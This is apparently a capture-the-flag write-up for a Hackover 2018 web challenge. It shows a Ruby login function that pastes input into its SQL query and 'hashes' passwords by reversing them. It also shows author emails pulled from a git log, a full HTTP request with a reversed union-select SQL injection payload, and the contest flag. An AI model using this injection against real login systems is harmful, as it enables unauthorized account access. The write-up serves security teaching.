Tags: stalking sql ruby sqlite sqlinjection sqli log git 


Howdy mate! Just login and hand out the flag, aye! You can find on h18johndoe has all you need!

What's interesting, the `h18johndoe` name points to a file in an external git repository (on github): [user_repo.rb](https://github.com/h18johndoe/user_repository/blob/master/user_repo.rb)

The interesting part of that code is:

def login(identification, password)
hashed_input_password = hash(password)
query = "select id, phone, email from users where email = '#{identification}' and password_digest = '#{hashed_input_password}' limit 1"
puts "SQL executing: '#{query}'"
@database[query].first if user_exists?(identification)

We can also see that the *hashing* function is a simple reverse func:

def hash(password)


We can see that along the `identification` field, the `password` field is posted (note that it's not in the original request - you have to add it by yourself as there is no *password* input).
Furthermore, the password field is - as we've just observed - *hashed* by reversing and what we post is inserted into the SQL query. We've got an `SQL injection`!

We can't inject the identification field, though (as a check is performed to see whether the user exists), so we use the `hashed_input_password` part. We still need either the email or phone number as an identification. How can we obtain them? Well, from the GIT log after cloning the repo (thanks [tezeb](https://github.com/tezeb) for reminding me about this!):

$ git clone https://github.com/h18johndoe/user_repository
Cloning into 'user_repository'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 12 (delta 2), reused 12 (delta 2), pack-reused 0
Unpacking objects: 100% (12/12), done.
$ cd user_repository/
$ git log | head -5
commit b26aed283d56c65845b02957a11d90bc091ac35a
Author: John Doe <[email protected]>
Date: Tue Oct 2 23:55:57 2018 +0200

Add login method
commit 3ec70acbf846037458c93e8d0cb79a6daac98515
Author: John Doe <[email protected]>
Date: Tue Oct 2 23:01:30 2018 +0200

Add user repo class and file

Thus, as we know what the *hashing* function does, we just supply the email and *hash* (reverse) the query to get in:

POST /login HTTP/1.1
Host: yo-know-john-dow.ctf.hackover.de:4567
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://yo-know-john-dow.ctf.hackover.de:4567/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
Cookie: (...)
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

[email protected]&password=-- 1 timil sresu morf enohp,2,1 tceles noinu 1=1 ro '

<title>Yah know john dow?</title>

<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="w3.css">
<script type="text/javascript" src="/js/script.js"></script>
<div class="w3-container w3-bar w3-indigo"> <h1>D0 Y0u kn0W j0Hn D0w?</h1> </div>
<div class="w3-main">
<div class="w3-bar w3-blue">
<div class="w3-bar-item w3-green w3-mobile">Logged in as: 0157 1337 42</div>
<div class="w3-container w3-center">


At this point we actually got frustrated since the flag didn't get accepted; we tried to go through the database (via `sqlite_master`) while pinging the organizers about the problem.

We didn't find anything in the DB and it was just a technical issue, after all - the organizers quickly fixed it, we submitted the flag and got the points :-)

**Flag:** `hackover18{I_KN0W_H4W_70_STALK_2018}`